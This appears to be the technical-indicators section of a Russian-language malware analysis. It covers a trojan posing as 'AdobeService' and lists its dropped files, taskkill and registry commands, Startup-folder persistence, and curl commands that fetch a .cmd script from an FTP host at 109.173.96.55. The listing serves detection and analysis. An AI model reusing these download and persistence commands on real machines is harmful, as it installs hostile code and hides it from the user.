Техническая информация
- %TEMP%\1.tmp\AdobeService.exe
- '%HOMEPATH%\Controll\Curl.exe' ftp://Co#######0000@109.173.96.55:20/Controll/Anonimus_20106/Anonimus_20106.cmd -o "%HOMEPATH%\Controll\temp\Anonimus_20106.cmd"
- '%HOMEPATH%\Controll\reservices.exe' 5
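- '%HOMEPATH%\Start Menu\Programs\Startup\AdobeService.exe' (путь находится в папке автозагрузки пользователя, то есть файл запускается при каждом входе в систему)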
- '%HOMEPATH%\Controll\Curl.exe' --ftp-create-dirs ftp://Co#######0000@109.173.96.55:20/Controll/Anonimus_20106/
- '<SYSTEM32>\taskkill.exe' /f /im "Curl.exe"
- '<SYSTEM32>\taskkill.exe' /f /im "reservices.exe"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\2.tmp\AdobeService.bat" "
- '<SYSTEM32>\taskkill.exe' /f /im "AdobeService.exe"
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\1.tmp\setup.bat" "
- '<SYSTEM32>\reg.exe' query "HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders" /v Startup
- '<SYSTEM32>\taskkill.exe' /f /im "AnVir.exe" (судя по имени, это процесс AnVir Task Manager — утилиты контроля процессов и автозагрузки)
- %TEMP%\2.tmp\AdobeService.bat
- %HOMEPATH%\Controll\NameSet.ini
- %HOMEPATH%\Controll\reset_work
- %TEMP%\1.tmp\reservices.exe
- %TEMP%\1.tmp\setup.bat
- %TEMP%\1.tmp\AdobeService.exe
- %TEMP%\1.tmp\curl.exe
- %HOMEPATH%\Controll\reset_work
- %TEMP%\1.tmp\setup.bat
- %TEMP%\1.tmp\reservices.exe в %HOMEPATH%\Controll\reservices.exe
- %TEMP%\1.tmp\curl.exe в %HOMEPATH%\Controll\Curl.exe
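- '10#.#73.96.55':20 (адрес частично замаскирован; по видимым цифрам и порту он, по-видимому, совпадает с FTP-узлом 109.173.96.55:20 из команд Curl.exe выше)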
- ClassName: '(null)' WindowName: '(null)'